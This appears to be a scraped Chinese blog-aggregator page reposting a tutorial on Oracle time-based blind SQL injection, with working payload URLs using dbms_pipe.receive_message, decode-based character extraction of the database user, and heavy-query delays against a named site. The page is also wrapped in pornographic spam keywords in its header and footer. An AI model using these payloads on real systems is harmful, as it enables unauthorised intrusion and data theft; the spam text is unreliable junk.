日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

oracle 布尔盲注,Oracle基于延时的盲注总结

發布時間:2024/7/23 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 oracle 布尔盲注,Oracle基于延时的盲注总结 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

0x00?前言

oracle注入中可以通過頁面響應的狀態,這里指的是響應時間,通過這種方式判斷SQL是否被執行的方式,便是時間盲注;

oracle的時間盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一種便是decode()與高耗時SQL操作的組合,當然也可以是case,if 等方式與高耗時操作的組合,這里的高耗時操作指的是,例如:(select count(*) from all_objects),對數據庫中大量數據進行查詢或其他處理的操作,這樣的操作會耗費較多的時間,然后通過這個方式來獲取數據。這種方式也適用于其他數據庫。

0x01?DBMS_PIPE.RECEIVE_MESSAGE()函數延時盲注

DBMS_LOCK.SLEEP()函數可以讓一個過程休眠很多秒,但使用該函數存在許多限制。

首先,不能直接將該函數注入子查詢中,因為Oracle不支持堆疊查詢(stacked query)。其次,只有數據庫管理員才能使用DBMS_LOCK包。

在Oracle PL/SQL中有一種更好的辦法,可以使用下面的指令以內聯方式注入延遲:

dbms_pipe.receive_message('RDS', 10)

DBMS_PIPE.RECEIVE_MESSAGE函數將為從RDS管道返回的數據等待10秒。默認情況下,允許以public權限執行該包。DBMS_LOCK.SLEEP()與之相反,它是一個可以用在SQL語句中的函數。

延遲盲注中的應用:

http://www.jsporcle.com/news.jsp?id=-1 or 1= dbms_pipe.receive_message('RDS', 10)--http://www.jsporcle.com/news.jsp?id=1 and 1=dbms_pipe.receive_message('RDS', 10)--

如果頁面延時10秒返回,即存在注入。

來自官網的DBMS_PIPE.RECEIVE_MESSAGE語法:

DBMS_PIPE.RECEIVE_MESSAGE (

pipename? ???IN VARCHAR2,

timeout? ?? ?IN INTEGER? ?? ?DEFAULT maxwait)

RETURN INTEGER;

可以暫時理解成DBMS_PIPE.RECEIVE_MESSAGE('任意值',延遲時間)

0x02 decode函數延時盲注

decode不僅可以在布爾盲注中運用,也可以用在延遲盲注中。

在decode注入里加入延時語句。這里加入了我們的dbms_pipe.receive_message函數。

and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual) --http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0) from dual) --

當然,這里延遲的操作不一定用延遲函數,也可以使用花費更多時間去查詢所有數據庫的條目。例如:

(select count(*) from all_objects)

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) and '1'='1'

通過這種明顯時間差也能判斷注入表達式的結果。

總結

以上是生活随笔為你收集整理的oracle 布尔盲注,Oracle基于延时的盲注总结的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 欧美男女啪啪 | 色吊丝av中文字幕 | 美日韩精品一区二区 | 9i免费看片黄 | 欧美自拍偷拍一区二区 | 人禽l交视频在线播放 视频 | 国精产品一区一区三区免费视频 | 成人av动漫 | 最新视频–x99av | 先锋资源一区二区 | 欧美小视频在线观看 | 日本www网站 | 香蕉久久国产av一区二区 | 亚洲综人网 | 久久亚洲精华国产精华液 | 99热热久久 | 亚洲性色av | 无码人妻丰满熟妇区96 | 女人被狂躁c到高潮喷水电影 | 亚洲午夜精品久久久久久人妖 | 黄色小视频入口 | 成人精品视频在线播放 | 免费观看毛片网站 | 波多野结衣久久久久 | 午夜做爰xxxⅹ性高湖视频美国 | 91蝌蚪少妇偷拍 | 国产在线美女 | 亚洲视频免费在线 | 国产裸体舞一区二区三区 | 国产亚洲色婷婷久久99精品 | 国产一区二区精华 | 高清性爱视频 | youjizz日韩 | 国产亚洲精品久久久久久无几年桃 | 91在线高清视频 | 中文字幕人妻无码系列第三区 | 精品黑人一区二区三区 | 亚洲国产精品久久久久爰性色 | 国产精品中文久久久久久 | 国模私拍一区二区 | 成人av动漫在线观看 | 揄拍自拍 | 国产农村妇女毛片精品久久麻豆 | 视频一区国产 | 亚洲av永久无码精品放毛片 | exo妈妈mv在线播放高清免费 | 熟女性饥渴一区二区三区 | 综合久久91 | 免费看亚洲| 久久成人福利视频 | 国产精品成熟老女人 | 色婷婷电影网 | 天堂一区二区三区四区 | 亚洲成人免费观看 | 99爱精品| 日韩欧美二区 | 伊人影院综合 | 欧美特黄视频 | xxxx日本少妇 | 欧美视频色| 99re99热| 欧美影院一区 | 日本一道本| 伊人毛片| 亚洲国产日韩欧美在线观看 | 亚洲一区欧美激情 | 一级大毛片 | 亚洲国产精品视频在线观看 | 美女被揉胸视频 | 色婷婷a| 国产男女激情 | 午夜国产在线视频 | 欧美绿帽合集xxxxx | 欧美另类在线播放 | 星铁乱淫h侵犯h文 | 日日夜夜狠狠干 | 成人性生交生交视频 | 国内精品卡一卡二卡三 | 四虎8848精品成人免费网站 | 亚洲精品视频免费在线观看 | 国产情侣一区 | 99国产精品99久久久久久 | 久久亚洲aⅴ无码精品 | 国产精品成人99一区无码 | 精品美女| 日本大尺度做爰呻吟 | 懂色av一区二区三区蜜臀 | 蜜桃视频在线观看一区 | 男女免费网站 | 久久黄色 | 精品一区二区三区电影 | 亚洲国产亚洲 | 欧美精品v国产精品v日韩精品 | 女人扒开腿让男人桶爽 | 91丨porny丨刺激| 一本色道久久综合亚洲精品酒店 | 自拍偷拍国产精品 | av私库 | 日韩免费福利 |